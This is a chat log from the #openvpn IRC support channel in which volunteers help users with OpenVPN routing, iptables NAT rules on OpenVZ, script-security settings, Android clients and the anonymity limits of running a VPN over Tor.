245 seconds] 12:00 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 12:01 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 12:05 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 12:05 -!- Valcorb [~Valcorb@84.198.139.192] has quit [Ping timeout: 245 seconds] 12:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:16 -!- Valcorb|| is now known as Valcorb 12:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:32 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 12:38 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has quit [Ping timeout: 248 seconds] 12:39 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn 12:39 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Remote host closed the connection] 12:41 < bandroidx> is there a way to supress the Openvpn Requires script-security 2 line on client connect? 12:41 < bandroidx> i tried verb 0 but its still showing 12:45 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn 13:11 -!- madsage [sage@2001:470:c:1292::2] has joined #openvpn 13:11 < madsage> word 13:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 13:17 -!- frsk [fredrik@joy.frsk.net] has quit [Quit: Reconnecting] 13:17 -!- frsk [fredrik@frsk.net] has joined #openvpn 13:18 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: leaving] 13:22 < madsage> http://pastebin.com/FLKHTm17 13:22 < madsage> anybody see anythign wrong with that? 13:23 < madsage> its not routing right. keeps handing me an ip of 10.10.253.6 and a gw of .5 13:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:23 < madsage> server uses 10.10.253.1 on tun1 13:24 < madsage> should i use ifconfig with 255.255.255.252? i'm the only connection 13:25 < madsage> any feedback would be highly appreciated. tia 13:29 < madsage> will redirect-gateway woth with ifconfig statements? i can just staticly assign if it plays together 13:29 < madsage> woth/work 13:40 < madsage> ok. .5 is only a virtual IP address inside the OpenVPN server, used as an endpoint for routes 13:41 < madsage> so my issue is not with the assignment address. i assume its bridged with .1 on the tun device internally 13:42 < madsage> If you know that only non-Windows clients will be connecting to your OpenVPN server, you can avoid this behavior by using the ifconfig-pool-linear directive. 13:42 < madsage> cool 13:43 < madsage> lets try that 13:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:10 < rob0> !/30 14:10 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 14:12 < rob0> madsage, ^^ 14:15 < rob0> bandroidx, did you try specifying a script-security setting in your config? If 'verb 0' didn't work, and that doesn't work either, your choices are to grep -v your logs such as not to see it, or to close your eyes and ignore it. :) 14:16 -!- novaflash is now known as novaflash_away 14:16 < bandroidx> LOL if it was me I wouldnt care, but i have ppl who use the server who keep telling me "it gives me an error!" 14:16 < bandroidx> lol 14:16 < bandroidx> speaking of script security that reminds me, i have a clientconnect.sh script that it runs and it wont work unless i set script-security 2 system 14:16 < bandroidx> it requires the system 14:16 < bandroidx> my guess is because it runs sqlite3 from the script 14:17 < bandroidx> i am just concerned because they say system call is deprecated 14:18 < rob0> iirc the warning about script-security is for backward compatibility with the changed setting. Older openvpn did not have that. 14:18 < bandroidx> so its safe to leave "system" ? 14:18 < rob0> "safe" is subjective, I cannot possibly guess. 14:19 < bandroidx> well i guess i dont have a choice 14:19 < rob0> See --script-security in the man page and decide what you want. 14:19 < bandroidx> i did 14:19 < bandroidx> thats where i read about it being deprecated 14:19 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Remote host closed the connection] 14:19 -!- novaflash_away is now known as novaflash 14:19 < bandroidx> based on what i read i prefer to NOT use it, but it seems I don't have a choice 14:20 < bandroidx> its no biggie the server is locked down 14:21 < bandroidx> i dont see a way anyone could inject into that script 14:21 < bandroidx> so i think system is safe to use 14:21 < madsage> rob0, thanks yeah i figured that out. was even trying to make my own /30 it didnt like it in server mode 14:21 < rob0> right, it seems unlikely to me also 14:21 < bandroidx> any idea if there is a way to tell openvpn to use multiple tunnels for a connection? 14:22 < bandroidx> i am connecting to a server overseas with bad peering and the only way to max out the connection is to use multiple connections 14:22 < bandroidx> like if I ftp file normally I get 1MB/s with a single transfer but if i set the client to download 6 files at once I get 6MB/s 14:22 < madsage> but, yeah i also enabled ifconfig-pool-linear helped some of my other routing i was trying to do 14:22 < bandroidx> i thought perhaps using multiple tunnels would simulate the same effect 14:23 < rob0> You can run as many instances as you want, I guess. The trick (and this is a question for your OS) is to load balance the traffic among the different tunnel IP addresses. 14:23 < bandroidx> i was hoping there was a way to do it with a single connection 14:23 < bandroidx> i didnt think so though 14:24 < bandroidx> like a magical --tunnelsperconnection argument :) 14:24 < madsage> rob0, is there a limit or ceiling per connection? 14:25 < madsage> or it varried per hardware and network variables 14:25 < madsage> varries 14:25 < rob0> right, varies 14:26 < rob0> Sometimes the lack of multi-threading can be an issue. Your openvpn process is stuck on one core/CPU, can't distribute the load via SMP threading. 14:26 < madsage> speaking of that. do you know of any linux kernel tuning that may help? like for buffers rcv/tx etc? 14:27 < madsage> or maybe kernel tick timing could help? 14:27 < rob0> (Multi-threading is something the developer folk have been planning to work on in the next version.) 14:27 < rob0> dunno 14:27 < madsage> rob0, yeah heard that. would be awesome 14:28 < madsage> especialy with all the new arm processors with multicores but not much power on single thread 14:34 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 240 seconds] 14:34 -!- Devastator [~devas@177.99.152.211] has joined #openvpn 14:34 -!- Devastator [~devas@177.99.152.211] has quit [Read error: Connection reset by peer] 14:36 -!- Devastator [~devas@177.99.152.211] has joined #openvpn 14:39 -!- mode/#openvpn [+v pekster] by ChanServ 15:03 < madsage> sweet everything is working now. updated both sides with 2.3.0 as well 15:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 15:04 < madsage> peace out and later krazee 15:04 -!- madsage [sage@2001:470:c:1292::2] has quit [Quit: BitchX: it's wax ecstatic] 15:05 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn 15:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:26 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 15:40 -!- brute11k [~brute11k@89.249.230.122] has quit [Quit: Leaving.] 15:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:49 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 16:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:47 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:55 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"] 17:00 -!- zz_AsadH is now known as AsadH 17:03 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 17:32 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 245 seconds] 17:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 17:48 -!- mythos [~mythos@unaffiliated/mythos] has quit [Remote host closed the connection] 17:49 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 18:59 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 19:21 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:21 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:21 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:21 -!- mode/#openvpn [+o krzee] by ChanServ 19:26 -!- AsadH is now known as zz_AsadH 19:54 < julius__> any hints on getting openvpn work over tor? 19:57 < uberushaximus> are you sure you don't want to do it the other way around? 19:58 < uberushaximus> it'll be hard to sustain openvpn over tor 19:59 < julius__> sure, i want a anonymous secure connection 19:59 < julius__> to another host 19:59 < julius__> which can be used by my host as a router 20:00 < julius__> havent found much online, are there options for high latency links? 20:00 <+pekster> VPN's aren't anonymous, FYI 20:00 <+pekster> They're the exact opposite of annonymous 20:01 <+pekster> You will very "annonymously" connect to the VPN server, where you will then provide a certificate or user/pass that uniquely identifies you as the source of the connections to that server. I don't see the point. 20:03 < julius__> just want to play around with it 20:04 < julius__> youre right, this one could kill all the anonymity 20:06 <+pekster> Not "could." "Does." 20:14 < julius__> so its a certainty in your world that you cant pay for a vpn endpoint without your name? 20:16 <+pekster> You still identify yourself. However that is established at the VPN provider. Maybe it's simply "User 52567" or such. But it still is unique to your connection. Not *you* specifically, but the VPN credentials are what I refer to. 20:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 20:29 < julius__> what if you pay with cash for a vps? 20:31 <+pekster> So what? You still get a certificate or user to auth with 20:35 < julius__> yes but you set your own openvpn server up 20:35 < julius__> isnt the connection secured even before the vpn is setup when the credentials are transfered? 20:38 <+pekster> Nope. X509 certs are sent in DER-encoded plaintext 20:38 < julius__> ok, didnt know that 20:39 <+pekster> Plus the provider may be legally compelled to keep logs, even if they "claim" they don't 20:39 < julius__> logs of what? 20:39 <+pekster> Your connection. See --log, --log-append, --syslog, and/or --daemon in the openvpn manpages 20:39 < julius__> the connection ip is from some tor node 20:40 <+pekster> That tie the credentials YOU used 20:40 <+pekster> Say that computer is picked up in a police raid. You have that private key that prooves that connection was initiated from *that* computer. Annonyminity busted. 20:40 <+pekster> Naturally, you don't have this problem using tor only, or first a VPN then tor. 20:41 <+pekster> This is pretty well-known in the tor community. 20:41 <+pekster> There's a popular set of slides that has a great way to remember this during his presentation. "Tor over VPN: OK. VPN over Tor: go to jail." Pretty straight forward, no? 20:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:45 < julius__> but ssh does transfer the login credential securely right? 20:56 <+pekster> Public components are always visible over the wire. Anything after a DH-handshake isn't. I'm sure wikipedia and other sites do a better job than I can at explaining TLS handshakes. 20:57 < julius__> ok 20:58 < julius__> but how is someone supposed to tie a x509 certificate back to you if the connection goes through tor? 20:59 <+pekster> Traffic analysis. Or use of any identifying details in the cert. Or compelling you to give up the hardware with your private key (or stealing it.) Probably other ways too. 21:00 < julius__> ok details in the cert would be bad 21:01 < julius__> but as far as i understand tor you cant just easily say that some connection comes from some host 21:01 <+pekster> And if you believe that providers are never served warrants that require them (legally) to tie a connection to a specific certificate/user/sourceIP, then you go on continuing to believe that. 21:02 <+pekster> I can't fix that kind of willful choice to ignore how laws & warrants work. I can explain how they techncially use that info to "out" people who think a VPN can protect them when they do things that a government may consider illegal. 21:03 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Ping timeout: 248 seconds] 21:09 < julius__> i know that they are 21:10 < julius__> hidemyassvpn did this for example, even if they did say they wouldnt. but since its a us company they are bound by law 21:10 < julius__> im more interrested in how 21:11 < julius__> pekster, have to sleep now. are you on tomorrow? 21:11 < julius__> n8 21:16 -!- julius__ [~julius@141.41.92.122] has quit [Ping timeout: 256 seconds] 21:32 -!- danharibo [~dan@razor-studios.co.uk] has joined #openvpn 21:32 < danharibo> hi, anyone about? 21:33 < danharibo> I'm getting this when trying to start my VPN client https://gist.github.com/b6e025748040a97dd040 21:33 <@vpnHelper> Title: gist:b6e025748040a97dd040 (at gist.github.com) 21:33 < danharibo> any idea where to start looking? 21:33 <+pekster> Missing tun support in your kernel it would appear 21:34 < danharibo> ooh wait I think I know why it's not working 21:34 < danharibo> I should restart after -Syu'ing 21:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:56 -!- corretico [~luis@190.211.93.38] has joined #openvpn 22:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 23:06 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 23:06 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has joined #openvpn 23:27 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 276 seconds] 23:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] --- Day changed Mon Feb 04 2013 00:02 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 00:04 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 00:38 < danharibo> Is enable GatewayPorts disouraged? 00:38 < danharibo> enabling* 00:39 <@krzee> whats GatewayPorts? thats not part of openvpn that i know of... 00:39 <+pekster> openssh option 00:39 <@krzee> ahh 00:45 <+pekster> Depends on usecase danharibo. Enable it if you need it, don't if you don't. It's like asking if you should open a port in your firewall for a LAN client. 00:46 < danharibo> fair enough 00:46 * krzee doublechecks where he is 00:46 < danharibo> yeah sorry I have openssh and openvpn open sequentially 00:46 <@krzee> ;] 00:46 <@krzee> np tho, nobody else is here talking anyways 00:46 <@krzee> but if you ask about the meaning of life, only answer ill give is 42 00:47 < danharibo> heh 00:47 <+pekster> No, no, that's "Life, the Universe, and Everything." 00:47 <+pekster> Well, maybe. We never found out what the question was, exactly :P 01:00 -!- Pei [pei@2600:3c00::f03c:91ff:feae:5e2d] has joined #openvpn 01:05 < Pei> Hi, i've got a OpenVPN running on my main server, My windows client connects fine and I can browse the web, connect to irc, basically use the internet. I have copied the /etc/openvpn exactly on another server, change the remote ip address in the windows config file, and connect. The client connects to the OpenVPN server on the new server, assigns an IP address, but I can't connect anywhere 01:05 < Pei> but the server openvpn is running on. iptables -L shows no firewall rules. Server is fresh install not 2 hours old. 01:06 < Pei> using Debian 6 01:06 <@krzee> iptables -L -t nat 01:07 <@krzee> on both servers 01:07 <@krzee> oh wait, even better 01:07 <@krzee> !redirect 01:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 01:07 <@vpnHelper> http://ircpimps.org/redirect.png 01:07 <@krzee> see the flowchart =] 01:08 < Pei> MASQUERADE all -- anywhere anywhere 01:08 < Pei> ^^^^^ is missing on new server 01:08 <+pekster> iptables -L is fundamentally broken. Use 'iptables-save' to dump rules 01:08 < nutcase> Whats the easiest way to daisy chain some vpns together? 01:08 <@krzee> im not asking to see it, im pointing it out to you 01:08 <@krzee> nutcase, by understanding this page VERY VERY well 01:08 <@krzee> !route 01:08 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 01:08 * nutcase starts reading 01:09 < Pei> !nat 01:09 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 01:09 <@krzee> you wanted 01:09 <@krzee> !linnat 01:09 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 01:11 < nutcase> krzee have you ever tried to use openvpn on an android device? 01:11 < nutcase> !android 01:11 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the 01:11 <@vpnHelper> market 01:11 <@krzee> nutcase, yep 01:11 < nutcase> There is a better OpenVPN client 01:12 <@krzee> was that a question? 01:12 <+pekster> Crazy (verry sill and non-sensical) chaining setup: http://fpaste.org/jRhL/ 01:12 < nutcase> https://play.google.com/store/apps/details?id=de.blinkt.openvpn&hl=en 01:12 <@vpnHelper> Title: OpenVPN for Android - Android Apps on Google Play (at play.google.com) 01:12 <+pekster> silly* 01:12 < nutcase> I never was able to config it to work 01:12 <@krzee> nutcase, you using ICS / JB? 01:12 < nutcase> JB 01:12 <@krzee> get a config that works in other os, like linux 01:12 <@krzee> then import it 01:13 <@krzee> it just works! 01:13 < Pei> when i do iptables -t nat -A POSTROUTING -s 10.1.10.0/24 -o venet0:0 -j MASQUERADE 01:13 < Pei> iptables: No chain/target/match by that name. 01:13 < Pei> i get that 01:13 < nutcase> lol alright I will mess with it again later 01:13 <@krzee> Pei, 01:13 <@krzee> !openvznat 01:13 <@vpnHelper> "openvznat" is (#1) a user reported success with this command: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to or (#2) someone else got it working with: iptables -t nat -A POSTROUTING -s / -o eth -j SNAT --to 01:13 <@krzee> you are in a virtual machine, im guessing openvz, amiright? 01:13 < Pei> yes 01:13 <@krzee> cool, there ya go =] 01:14 < Pei> okay thanks 01:14 <@krzee> np 01:14 <@krzee> nutcase, there is also another android app, but ive never used it 01:14 <+pekster> You're missing the listed chain, target, or match support in your kernel. Possibly MASQUERADE, although in theory it could be nat support too. Probably not the chain, since nat table support implicitly includes the 3 standard chains 01:14 <@krzee> i really really like the app you linked me to 01:15 <@krzee> pekster, known openvz thing 01:15 < nutcase> yeah krzee thats the one I was talking about :) 01:15 < Pei> here goes nothin 01:15 <+pekster> krzee: Yes, I know. Some providers *also* don't include the right modules for OpenVZ containers 01:15 < nutcase> I read some guides a while ago and they suggested using that one over the actual openvpn client because this one works better 01:16 <+pekster> BSD-licensed too, that's nice 01:16 <@krzee> nutcase, this version was released by an active openvpn community developer and is open source, the other was by openvpn technologies and is not open source 01:16 < nutcase> ah 01:17 <@krzee> i have no plans on playing with the closed source version 01:17 < nutcase> https://play.google.com/store/apps/details?id=net.openvpn.openvpn 01:17 <@vpnHelper> Title: OpenVPN Connect - Android Apps on Google Play (at play.google.com) 01:17 < nutcase> Thats the closed source version? 01:17 <@krzee> yes 01:18 < nutcase> Yeah that one is buggy in my experience and from what I have read of other peoples experinces 01:18 <@krzee> makes sense that it could be buggier at first, it was a full re-code in a different language 01:19 <@krzee> whereas the opensource version is basically the same ol opensource code you're running on linux 01:19 < nutcase> yeah 01:19 < nutcase> Does MIUI come with openvpn already installed like CM? 01:19 <@krzee> they had to do the re-code if i understood right, to get accepted to Itunes store for IOS 01:20 <@krzee> no idea, i use CM 01:20 <@krzee> ask MIUI 01:20 < nutcase> What device? 01:20 < nutcase> there isnt a miui channel on this server lol 01:20 <+pekster> How's that non-free one work with the GPL-status of OpenVPN? Is *all* the code there really dual-licensed by "OpenVPN Technologies" from every committer? 01:20 <@krzee> *shrug* 01:20 < Pei> HAH 01:21 < Pei> thank you soooooooo much 01:21 <@krzee> pekster, full re-code 01:21 <+pekster> I mean, I don't really expect the small-ish patches I've submitted to be given special licensing status, but I've submitted 4 or 5 patches over the years that have been merged. I signed no agreement 01:21 <@krzee> oh wait 01:21 <+pekster> Ah, okay 01:21 <@krzee> you mean access-server? 01:21 <+pekster> No, the 'droid code 01:21 <@krzee> ahh ok, yes full recode 01:21 <+pekster> Weird :\ 01:21 < Pei> iptables -t nat -A POSTROUTING -s 10.2.10.0/24 -j SNAT --to 198.23.248.15 <--- that one did the trick 01:22 <@krzee> not so weird 01:22 <@krzee> apples fault 01:22 <@krzee> they had to do the re-code if i understood right, to get accepted to Itunes store for IOS 01:22 <@krzee> itunes store is incompat with gpl from my understanding 01:22 <@krzee> itunes apps arent allowed to be opensource if i understood 01:22 < nutcase> apple sucks 01:22 <@krzee> (i may have only understood 1/2 way) 01:23 <@krzee> nutcase, my currently owned devices are here: http://forum.xda-developers.com/member.php?u=2820309 01:23 < nutcase> ah 01:23 < Pei> so, lame question but i iptables absolutely terrifies me.... what's the best way to apply that rule everytime the machine boots 01:24 < Pei> on debian 01:24 <@krzee> Pei, #debian 01:24 < nutcase> woah my user number on xda is low 01:24 < Pei> aww come on buds ;)' 01:24 <@krzee> if you asked about freebsd ild tell you, im not googling debian crap :-p 01:25 <+pekster> That's an OS-level knob; for all I (maybe "we") care, write your own initscript (Gentoo has a very nice init script for iptables/netfilter. AFAIK debian does not.) 01:25 <@krzee> damn 2006, nice 01:25 <+pekster> I've hooked into the pre-up feature of debian before, but I'm not sure that's the "proper" way to do it in debian. I just got annoyed when docs suggested I use ufw, so I wrote my own code on my AWS Ubuntu server 01:26 < nutcase> heh I've been around for a while :P 01:26 * pekster doesn't touch tools like ufw or shorewall 01:27 < Devastator> according to debian wiki, if-pre-up.d is the right place to put a ruleset 01:28 <+pekster> Apparenlty that's what I did 01:29 <+pekster> I named an 05iptables script there that does some magic and ultimately calls iptables-restore if I deem it necessary 01:29 < Devastator> yes, like "The perfect ruleset" doc says.. 01:30 <+pekster> http://fpaste.org/OoRh/ if you want some ideas 01:30 <+pekster> I just cooked that up to meet my needs, so edit to taste 01:32 <@krzee> time for me to sleep(8) 01:32 <@krzee> goodnight 01:32 < Devastator> night krzee 01:38 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has quit [Quit: Tabrenus] 02:36 -!- mattock_afk is now known as mattock 03:04 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:15 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 03:15 < zrzerenato> hi every one.. 03:16 < zrzerenato> im getting error with the system clock to sync with VPN. can someone help please? 03:17 -!- brute11k [~brute11k@89.249.230.122] has joined #openvpn 03:18 < zrzerenato> i believe, someone at my job restart the system pushing the power buttom, and all the system time is crazy, so now i cannot connect throgh VPN 03:23 <+EugeneKay> man ntp 03:24 <+EugeneKay> And buy a new server, because if the BIOS battery is dead you're using antique hardware. 03:25 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has quit [Read error: Connection reset by peer] 03:25 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 03:27 -!- Porkepix [~Porkepix@157.138.188.104] has joined #openvpn 03:28 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has quit [Client Quit] 03:29 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out] 03:50 -!- Porkepix [~Porkepix@157.138.188.104] has quit [Quit: Computer has gone to sleep.] 04:05 -!- zz_AsadH is now known as AsadH 04:19 -!- mode/#openvpn [-v pekster] by ChanServ 04:19 -!- mode/#openvpn [-v pekster] by ChanServ 04:20 < pekster> Laggy chanserv :\ 04:34 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 04:35 < sam1> hm, what could be the problem if openvpn pushes gateway 0.0.0.0 for destination 0.0.0.0? I'm checking the routing table on the client.. If I add redirect-gateway directive, there will be an gateway address for destination 0.0.0.0 04:36 < sam1> I'm using openvpn with bridging 04:44 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out] 04:51 < kisom> sam1: Are you sure openvpn is pushing it? Enable verb 7 and check everything that is being pushed 05:00 < sam1> kisom: Mon Feb 4 11:58:11 2013 us=125344 client1/remote-ip:55532 SENT CONTROL [client1]: 'PUSH_REPLY,dhcp-option DNS 10.10.66.1,dhcp-option DOMAIN DERP,route-gateway 10.10.66.7,ping 10,ping-restart 120,ifconfig 10.10.66.201 255.255.255.0' (status=1) 05:00 < sam1> kisom: seems so. 05:09 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds] 05:14 < sam1> kisom: but I don't see anything regarding the gateway on client side. I see something that is quite wierd though " Inernal IP4 Point-To-Point Address: 0.0.0.0" 05:22 -!- brute11k1 [~brute11k@89.249.231.171] has joined #openvpn 05:22 -!- brute11k [~brute11k@89.249.230.122] has quit [Read error: Operation timed out] 05:25 < sam1> Using another vpn service I see there is a " Internal Gateway: " on the client side. 05:25 < sam1> wierd. 05:46 -!- ScriptFanix [~vincent@Hanaman.riquer.fr] has joined #openvpn 05:46 -!- ScriptFanix [~vincent@Hanaman.riquer.fr] has quit [Client Quit] 05:46 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 05:47 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 245 seconds] 05:47 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 05:48 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:04 -!- ade_b [~Ade@37.250.11.72.bredband.tre.se] has joined #openvpn 06:04 -!- ade_b [~Ade@37.250.11.72.bredband.tre.se] has quit [Changing host] 06:04 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:09 -!- Porkepix [~Porkepix@157.138.190.79] has joined #openvpn 06:11 < sam1> kisom: got it working. 06:11 < sam1> kisom: http://openvpn.net/index.php/open-source/faq/77-server/323-i-want-to-set-up-an-ethernet-bridge-on-the-1921681024-subnet-existing-dhcp.html I tried with that first, but still the gateway wasn't setup on client, even though the server pushed it 06:11 <@vpnHelper> Title: I want to set up an ethernet bridge on the 192.168.1.0/24 subnet. existing DHCP. (at openvpn.net) 06:12 < sam1> kisom: then I combined it with redirect-gateway def1, since I have seen it set gw on client 06:12 < sam1> kisom: so now it routes all traffic from client to the gw on lan at remote site, 06:14 < sam1> I'm wondering if the howto here is really correct: http://openvpn.net/index.php/open-source/documentation/miscellaneous/76-ethernet-bridging.html 06:14 <@vpnHelper> Title: Ethernet Bridging (at openvpn.net) 06:15 < sam1> if you compare it to the answered question above 06:15 -!- julius_ [~julius@141.41.92.122] has joined #openvpn 06:16 < sam1> according to the ethernet bridge guide, you are suppose to use the vpn machine as gw. but in the FAQ they describe how to use the LAN gw 06:17 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 245 seconds] 06:19 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn 06:26 -!- Devastator- [~devas@177.99.152.211] has joined #openvpn 06:26 -!- Devastator- [~devas@177.99.152.211] has quit [Changing host] 06:26 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 06:27 -!- Devastator [~devas@177.99.152.211] has quit [Read error: Connection reset by peer] 06:28 -!- uberushaximus [~uberushax@shepard.sypherz.com] has quit [Ping timeout: 252 seconds] 06:28 -!- william_ [~x@lotus.redl8.com] has quit [Ping timeout: 252 seconds] 06:29 -!- william_ [~x@lotus.redl8.com] has joined #openvpn 06:29 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn 06:30 -!- Devastator- is now known as Devastator 06:45 -!- Porkepix [~Porkepix@157.138.190.79] has quit [Quit: Computer has gone to sleep.] 06:47 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 06:56 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:59 -!- Porkepix [~Porkepix@157.138.189.185] has joined #openvpn 07:02 -!- master_of_master [~master_of@p57B554B3.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:04 -!- master_of_master [~master_of@p57B55202.dip.t-dialin.net] has joined #openvpn 07:49 -!- dazo_afk is now known as dazo 07:49 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 248 seconds] 07:50 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:52 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 07:55 -!- oyunokata [~rrinehart@209.163.177.130] has joined #openvpn 07:56 <@dazo> Anyone remember if there are any issues running both a Cisco VPN and OpenVPN simultaneously? Both running as a client 07:57 < havoc> the obvious ones 07:57 < havoc> redir-gw, conflicting subnets, etc... 07:57 <@dazo> yeah, except of that, I meant 07:57 < havoc> otherwise they coexist 07:57 